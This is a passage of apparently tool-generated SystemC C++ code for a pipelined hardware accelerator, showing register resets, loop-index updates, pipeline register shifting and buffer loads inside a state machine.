ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter7 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter7 = ap_enable_reg_pp0_iter6.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter8 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter8 = ap_enable_reg_pp0_iter7.read(); } } if ( ap_rst_n_inv.read() == ap_const_logic_1) { ap_enable_reg_pp0_iter9 = ap_const_logic_0; } else { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011011.read(), ap_const_boolean_0))) { ap_enable_reg_pp0_iter9 = ap_enable_reg_pp0_iter8.read(); } } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { col_b_reg_543 = col_b_cast2_mid2_reg_2489.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { col_b_reg_543 = ap_const_lv5_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { i_reg_472 = i_cast7_mid2_reg_2386.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { i_reg_472 = ap_const_lv3_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { indvar_flatten1_reg_461 = indvar_flatten_next3_reg_2233.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { indvar_flatten1_reg_461 = ap_const_lv17_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { indvar_flatten2_reg_484 = indvar_flatten_next2_reg_2280.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { indvar_flatten2_reg_484 = ap_const_lv16_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { indvar_flatten3_reg_507 = indvar_flatten_next1_reg_2381.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { indvar_flatten3_reg_507 = ap_const_lv14_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { indvar_flatten_reg_531 = indvar_flatten_next_reg_2376.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { indvar_flatten_reg_531 = ap_const_lv10_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { j_reg_495 = j_cast5_mid2_reg_2395.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { j_reg_495 = ap_const_lv3_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { row_b_reg_519 = row_b_cast3_mid2_reg_2473.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { row_b_reg_519 = ap_const_lv5_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { to_b_reg_555 = to_b_1_reg_2463.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_state1.read()) && esl_seteq<1,1,1>(ap_start.read(), ap_const_logic_1))) { to_b_reg_555 = ap_const_lv5_0; } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_bufo_addr_reg_2650 = ap_reg_pp0_iter9_bufo_addr_reg_2650.read(); ap_reg_pp0_iter11_bufo_addr_reg_2650 = ap_reg_pp0_iter10_bufo_addr_reg_2650.read(); ap_reg_pp0_iter12_bufo_addr_reg_2650 = ap_reg_pp0_iter11_bufo_addr_reg_2650.read(); ap_reg_pp0_iter13_bufo_addr_reg_2650 = ap_reg_pp0_iter12_bufo_addr_reg_2650.read(); ap_reg_pp0_iter14_bufo_addr_reg_2650 = ap_reg_pp0_iter13_bufo_addr_reg_2650.read(); ap_reg_pp0_iter1_bufo_addr_reg_2650 = bufo_addr_reg_2650.read(); ap_reg_pp0_iter2_bufo_addr_reg_2650 = ap_reg_pp0_iter1_bufo_addr_reg_2650.read(); ap_reg_pp0_iter2_tmp_8_2_reg_3554 = tmp_8_2_reg_3554.read(); ap_reg_pp0_iter3_bufo_addr_reg_2650 = ap_reg_pp0_iter2_bufo_addr_reg_2650.read(); ap_reg_pp0_iter4_bufo_addr_reg_2650 = ap_reg_pp0_iter3_bufo_addr_reg_2650.read(); ap_reg_pp0_iter5_bufo_addr_reg_2650 = ap_reg_pp0_iter4_bufo_addr_reg_2650.read(); ap_reg_pp0_iter6_bufo_addr_reg_2650 = ap_reg_pp0_iter5_bufo_addr_reg_2650.read(); ap_reg_pp0_iter7_bufo_addr_reg_2650 = ap_reg_pp0_iter6_bufo_addr_reg_2650.read(); ap_reg_pp0_iter8_bufo_addr_reg_2650 = ap_reg_pp0_iter7_bufo_addr_reg_2650.read(); ap_reg_pp0_iter9_bufo_addr_reg_2650 = ap_reg_pp0_iter8_bufo_addr_reg_2650.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter9_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter10_tmp_8_s_reg_3654 = ap_reg_pp0_iter9_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter11_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter10_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter12_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter11_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter13_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter12_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter14_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter13_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter15_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter14_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter1_exitcond_flatten3_reg_2229 = exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter2_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter3_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter2_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter3_tmp_8_s_reg_3654 = tmp_8_s_reg_3654.read(); ap_reg_pp0_iter4_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter3_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter4_tmp_8_s_reg_3654 = ap_reg_pp0_iter3_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter5_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter4_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter5_tmp_8_s_reg_3654 = ap_reg_pp0_iter4_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter6_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter5_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter6_tmp_8_s_reg_3654 = ap_reg_pp0_iter5_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter7_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter6_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter7_tmp_8_s_reg_3654 = ap_reg_pp0_iter6_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter8_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter7_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter8_tmp_8_s_reg_3654 = ap_reg_pp0_iter7_tmp_8_s_reg_3654.read(); ap_reg_pp0_iter9_exitcond_flatten3_reg_2229 = ap_reg_pp0_iter8_exitcond_flatten3_reg_2229.read(); ap_reg_pp0_iter9_tmp_8_s_reg_3654 = ap_reg_pp0_iter8_tmp_8_s_reg_3654.read(); exitcond_flatten3_reg_2229 = exitcond_flatten3_fu_621_p2.read(); tmp_6_reg_2219 = tmp_6_fu_599_p2.read(); tmp_s_reg_2224 = tmp_s_fu_615_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_tmp_8_10_reg_3659 = ap_reg_pp0_iter9_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter3_tmp_8_10_reg_3659 = tmp_8_10_reg_3659.read(); ap_reg_pp0_iter4_tmp_8_10_reg_3659 = ap_reg_pp0_iter3_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter5_tmp_8_10_reg_3659 = ap_reg_pp0_iter4_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter6_tmp_8_10_reg_3659 = ap_reg_pp0_iter5_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter7_tmp_8_10_reg_3659 = ap_reg_pp0_iter6_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter8_tmp_8_10_reg_3659 = ap_reg_pp0_iter7_tmp_8_10_reg_3659.read(); ap_reg_pp0_iter9_tmp_8_10_reg_3659 = ap_reg_pp0_iter8_tmp_8_10_reg_3659.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_tmp_8_11_reg_3669 = ap_reg_pp0_iter9_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter11_tmp_8_11_reg_3669 = ap_reg_pp0_iter10_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter3_tmp_8_11_reg_3669 = tmp_8_11_reg_3669.read(); ap_reg_pp0_iter4_tmp_8_11_reg_3669 = ap_reg_pp0_iter3_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter5_tmp_8_11_reg_3669 = ap_reg_pp0_iter4_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter6_tmp_8_11_reg_3669 = ap_reg_pp0_iter5_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter7_tmp_8_11_reg_3669 = ap_reg_pp0_iter6_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter8_tmp_8_11_reg_3669 = ap_reg_pp0_iter7_tmp_8_11_reg_3669.read(); ap_reg_pp0_iter9_tmp_8_11_reg_3669 = ap_reg_pp0_iter8_tmp_8_11_reg_3669.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_tmp_8_12_reg_3674 = ap_reg_pp0_iter9_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter11_tmp_8_12_reg_3674 = ap_reg_pp0_iter10_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter12_tmp_8_12_reg_3674 = ap_reg_pp0_iter11_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter3_tmp_8_12_reg_3674 = tmp_8_12_reg_3674.read(); ap_reg_pp0_iter4_tmp_8_12_reg_3674 = ap_reg_pp0_iter3_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter5_tmp_8_12_reg_3674 = ap_reg_pp0_iter4_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter6_tmp_8_12_reg_3674 = ap_reg_pp0_iter5_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter7_tmp_8_12_reg_3674 = ap_reg_pp0_iter6_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter8_tmp_8_12_reg_3674 = ap_reg_pp0_iter7_tmp_8_12_reg_3674.read(); ap_reg_pp0_iter9_tmp_8_12_reg_3674 = ap_reg_pp0_iter8_tmp_8_12_reg_3674.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_tmp_8_13_reg_3679 = ap_reg_pp0_iter9_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter11_tmp_8_13_reg_3679 = ap_reg_pp0_iter10_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter12_tmp_8_13_reg_3679 = ap_reg_pp0_iter11_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter13_tmp_8_13_reg_3679 = ap_reg_pp0_iter12_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter3_tmp_8_13_reg_3679 = tmp_8_13_reg_3679.read(); ap_reg_pp0_iter4_tmp_8_13_reg_3679 = ap_reg_pp0_iter3_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter5_tmp_8_13_reg_3679 = ap_reg_pp0_iter4_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter6_tmp_8_13_reg_3679 = ap_reg_pp0_iter5_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter7_tmp_8_13_reg_3679 = ap_reg_pp0_iter6_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter8_tmp_8_13_reg_3679 = ap_reg_pp0_iter7_tmp_8_13_reg_3679.read(); ap_reg_pp0_iter9_tmp_8_13_reg_3679 = ap_reg_pp0_iter8_tmp_8_13_reg_3679.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter10_tmp_8_14_reg_3684 = ap_reg_pp0_iter9_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter11_tmp_8_14_reg_3684 = ap_reg_pp0_iter10_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter12_tmp_8_14_reg_3684 = ap_reg_pp0_iter11_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter13_tmp_8_14_reg_3684 = ap_reg_pp0_iter12_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter14_tmp_8_14_reg_3684 = ap_reg_pp0_iter13_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter3_tmp_8_14_reg_3684 = tmp_8_14_reg_3684.read(); ap_reg_pp0_iter4_tmp_8_14_reg_3684 = ap_reg_pp0_iter3_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter5_tmp_8_14_reg_3684 = ap_reg_pp0_iter4_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter6_tmp_8_14_reg_3684 = ap_reg_pp0_iter5_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter7_tmp_8_14_reg_3684 = ap_reg_pp0_iter6_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter8_tmp_8_14_reg_3684 = ap_reg_pp0_iter7_tmp_8_14_reg_3684.read(); ap_reg_pp0_iter9_tmp_8_14_reg_3684 = ap_reg_pp0_iter8_tmp_8_14_reg_3684.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_3_reg_3574 = tmp_8_3_reg_3574.read(); ap_reg_pp0_iter3_tmp_8_3_reg_3574 = ap_reg_pp0_iter2_tmp_8_3_reg_3574.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_4_reg_3594 = tmp_8_4_reg_3594.read(); ap_reg_pp0_iter3_tmp_8_4_reg_3594 = ap_reg_pp0_iter2_tmp_8_4_reg_3594.read(); ap_reg_pp0_iter4_tmp_8_4_reg_3594 = ap_reg_pp0_iter3_tmp_8_4_reg_3594.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_5_reg_3609 = tmp_8_5_reg_3609.read(); ap_reg_pp0_iter3_tmp_8_5_reg_3609 = ap_reg_pp0_iter2_tmp_8_5_reg_3609.read(); ap_reg_pp0_iter4_tmp_8_5_reg_3609 = ap_reg_pp0_iter3_tmp_8_5_reg_3609.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_6_reg_3624 = tmp_8_6_reg_3624.read(); ap_reg_pp0_iter3_tmp_8_6_reg_3624 = ap_reg_pp0_iter2_tmp_8_6_reg_3624.read(); ap_reg_pp0_iter4_tmp_8_6_reg_3624 = ap_reg_pp0_iter3_tmp_8_6_reg_3624.read(); ap_reg_pp0_iter5_tmp_8_6_reg_3624 = ap_reg_pp0_iter4_tmp_8_6_reg_3624.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_7_reg_3634 = tmp_8_7_reg_3634.read(); ap_reg_pp0_iter3_tmp_8_7_reg_3634 = ap_reg_pp0_iter2_tmp_8_7_reg_3634.read(); ap_reg_pp0_iter4_tmp_8_7_reg_3634 = ap_reg_pp0_iter3_tmp_8_7_reg_3634.read(); ap_reg_pp0_iter5_tmp_8_7_reg_3634 = ap_reg_pp0_iter4_tmp_8_7_reg_3634.read(); ap_reg_pp0_iter6_tmp_8_7_reg_3634 = ap_reg_pp0_iter5_tmp_8_7_reg_3634.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_8_reg_3639 = tmp_8_8_reg_3639.read(); ap_reg_pp0_iter3_tmp_8_8_reg_3639 = ap_reg_pp0_iter2_tmp_8_8_reg_3639.read(); ap_reg_pp0_iter4_tmp_8_8_reg_3639 = ap_reg_pp0_iter3_tmp_8_8_reg_3639.read(); ap_reg_pp0_iter5_tmp_8_8_reg_3639 = ap_reg_pp0_iter4_tmp_8_8_reg_3639.read(); ap_reg_pp0_iter6_tmp_8_8_reg_3639 = ap_reg_pp0_iter5_tmp_8_8_reg_3639.read(); ap_reg_pp0_iter7_tmp_8_8_reg_3639 = ap_reg_pp0_iter6_tmp_8_8_reg_3639.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0))) { ap_reg_pp0_iter2_tmp_8_9_reg_3649 = tmp_8_9_reg_3649.read(); ap_reg_pp0_iter3_tmp_8_9_reg_3649 = ap_reg_pp0_iter2_tmp_8_9_reg_3649.read(); ap_reg_pp0_iter4_tmp_8_9_reg_3649 = ap_reg_pp0_iter3_tmp_8_9_reg_3649.read(); ap_reg_pp0_iter5_tmp_8_9_reg_3649 = ap_reg_pp0_iter4_tmp_8_9_reg_3649.read(); ap_reg_pp0_iter6_tmp_8_9_reg_3649 = ap_reg_pp0_iter5_tmp_8_9_reg_3649.read(); ap_reg_pp0_iter7_tmp_8_9_reg_3649 = ap_reg_pp0_iter6_tmp_8_9_reg_3649.read(); ap_reg_pp0_iter8_tmp_8_9_reg_3649 = ap_reg_pp0_iter7_tmp_8_9_reg_3649.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_10_reg_3504 = bufi_Dout_A.read(); bufw_load_9_reg_3499 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_11_reg_3539 = bufi_Dout_A.read(); bufw_load_10_reg_3534 = bufw_Dout_A.read(); tmp_8_1_reg_3529 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_12_reg_3564 = bufi_Dout_A.read(); bufw_load_11_reg_3559 = bufw_Dout_A.read(); tmp_8_2_reg_3554 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_13_reg_3584 = bufi_Dout_A.read(); bufw_load_12_reg_3579 = bufw_Dout_A.read(); tmp_8_3_reg_3574 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_14_reg_3604 = bufi_Dout_A.read(); bufw_load_13_reg_3599 = bufw_Dout_A.read(); tmp_8_4_reg_3594 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_15_reg_3614 = bufi_Dout_A.read(); tmp_8_5_reg_3609 = grp_fu_571_p2.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0))) { bufi_load_1_reg_2974 = bufi_Dout_A.read(); bufw_load_8_reg_2979 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0))) { bufi_load_2_reg_3059 = bufi_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00011001.read(), ap_const_boolean_0))) { bufi_load_3_reg_3109 = bufi_Dout_A.read(); bufw_load_1_reg_3104 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()))) { bufi_load_4_reg_3159 = bufi_Dout_A.read(); bufw_load_2_reg_3154 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_5_reg_3269 = bufi_Dout_A.read(); bufw_load_3_reg_3264 = bufw_Dout_A.read(); } if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_const_lv1_0, ap_reg_pp0_iter1_exitcond_flatten3_reg_2229.read()))) { bufi_load_6_reg_3339 = 